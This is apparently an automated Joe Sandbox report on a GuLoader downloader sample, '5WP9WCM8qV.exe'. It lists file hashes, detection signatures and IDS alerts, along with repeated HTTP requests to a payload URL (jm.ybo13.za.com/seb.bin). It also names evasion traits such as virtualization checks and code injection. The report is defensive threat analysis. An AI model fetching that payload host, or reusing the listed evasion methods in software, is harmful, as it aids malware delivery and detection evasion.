Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5WP9WCM8qV.exe

Overview

General Information

Sample name:5WP9WCM8qV.exe
renamed because original name is a hash value
Original sample name:950a25a2f21613cae69f796f6a3eeab57f92b711afb746dfeafefa00d5bfad55.exe
Analysis ID:1549406
MD5:649ba11fd51e50393b1cf0f461b90cbf
SHA1:99dc18ad322a073c6e17e5c129832f85f2092b6c
SHA256:950a25a2f21613cae69f796f6a3eeab57f92b711afb746dfeafefa00d5bfad55
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 5WP9WCM8qV.exe (PID: 7864 cmdline: "C:\Users\user\Desktop\5WP9WCM8qV.exe" MD5: 649BA11FD51E50393B1CF0F461B90CBF)
    • 5WP9WCM8qV.exe (PID: 8024 cmdline: "C:\Users\user\Desktop\5WP9WCM8qV.exe" MD5: 649BA11FD51E50393B1CF0F461B90CBF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1526284301.0000000006145000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.3280318515.0000000003565000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: 5WP9WCM8qV.exe PID: 7864JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-05T16:13:44.632588+010020229301A Network Trojan was detected4.175.87.197443192.168.2.849706TCP
        2024-11-05T16:14:23.191975+010020229301A Network Trojan was detected4.175.87.197443192.168.2.849712TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-05T16:13:48.306164+010028032702Potentially Bad Traffic192.168.2.84970845.33.20.23580TCP
        2024-11-05T16:13:58.967249+010028032702Potentially Bad Traffic192.168.2.84970945.33.20.23580TCP
        2024-11-05T16:14:09.808561+010028032702Potentially Bad Traffic192.168.2.84971045.33.20.23580TCP
        2024-11-05T16:14:20.444838+010028032702Potentially Bad Traffic192.168.2.84971145.33.20.23580TCP
        2024-11-05T16:14:31.080249+010028032702Potentially Bad Traffic192.168.2.84971345.33.20.23580TCP
        2024-11-05T16:14:41.699854+010028032702Potentially Bad Traffic192.168.2.84971445.33.20.23580TCP
        2024-11-05T16:14:52.317635+010028032702Potentially Bad Traffic192.168.2.84971545.33.20.23580TCP
        2024-11-05T16:15:02.954283+010028032702Potentially Bad Traffic192.168.2.84971645.33.20.23580TCP
        2024-11-05T16:15:13.564833+010028032702Potentially Bad Traffic192.168.2.84971745.33.20.23580TCP
        2024-11-05T16:15:24.173235+010028032702Potentially Bad Traffic192.168.2.84971845.33.20.23580TCP
        2024-11-05T16:15:34.802466+010028032702Potentially Bad Traffic192.168.2.84971945.33.20.23580TCP
        2024-11-05T16:15:45.435578+010028032702Potentially Bad Traffic192.168.2.84972045.33.20.23580TCP
        2024-11-05T16:15:56.075437+010028032702Potentially Bad Traffic192.168.2.84972145.33.20.23580TCP
        2024-11-05T16:16:06.684759+010028032702Potentially Bad Traffic192.168.2.84972245.33.20.23580TCP
        2024-11-05T16:16:17.305113+010028032702Potentially Bad Traffic192.168.2.84972345.33.20.23580TCP
        2024-11-05T16:16:27.980874+010028032702Potentially Bad Traffic192.168.2.84972445.33.20.23580TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 5WP9WCM8qV.exeAvira: detected
        Source: 5WP9WCM8qV.exeReversingLabs: Detection: 21%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: 5WP9WCM8qV.exeJoe Sandbox ML: detected
        Source: 5WP9WCM8qV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 5WP9WCM8qV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp
        Source: Binary string: mshtml.pdbUGP source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
        Source: Joe Sandbox ViewIP Address: 45.33.20.235 45.33.20.235
        Source: Joe Sandbox ViewIP Address: 45.33.20.235 45.33.20.235
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49717 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49716 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49708 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49710 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49721 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49720 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49722 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49719 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49714 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49724 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49713 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49723 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49718 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49711 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49715 -> 45.33.20.235:80
        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49712
        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49706
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: jm.ybo13.za.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:13:47 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:13:47 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:13:47 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:13:58 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:09 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:20 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:31 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:41 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:52 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:02 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:13 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:24 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:34 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:45 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:56 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:16:06 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:16:17 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:16:27 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.bin
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.bin&4r
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.bin2476756634-1003q
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.bin7
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.bin?
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.binR4
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.binU4C
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.binZ
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.bing4
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.binlI
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.binm4
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.binp4
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.binshqos.dll.mui
        Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jm.ybo13.za.com/seb.binza.com/seb.bin
        Source: 5WP9WCM8qV.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
        Source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_004070410_2_00407041
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_0040686A0_2_0040686A
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_00404B300_2_00404B30
        Source: 5WP9WCM8qV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal88.troj.evad.winEXE@3/9@1/1
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeFile created: C:\Users\user\AppData\Roaming\lsrivelserneJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeFile created: C:\Users\user\AppData\Local\Temp\nsv1D39.tmpJump to behavior
        Source: 5WP9WCM8qV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 5WP9WCM8qV.exeReversingLabs: Detection: 21%
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeFile read: C:\Users\user\Desktop\5WP9WCM8qV.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\5WP9WCM8qV.exe "C:\Users\user\Desktop\5WP9WCM8qV.exe"
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeProcess created: C:\Users\user\Desktop\5WP9WCM8qV.exe "C:\Users\user\Desktop\5WP9WCM8qV.exe"
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeProcess created: C:\Users\user\Desktop\5WP9WCM8qV.exe "C:\Users\user\Desktop\5WP9WCM8qV.exe"Jump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\5WP9WCM8qV.exeSection loaded: shfolder.dllJump to behavior
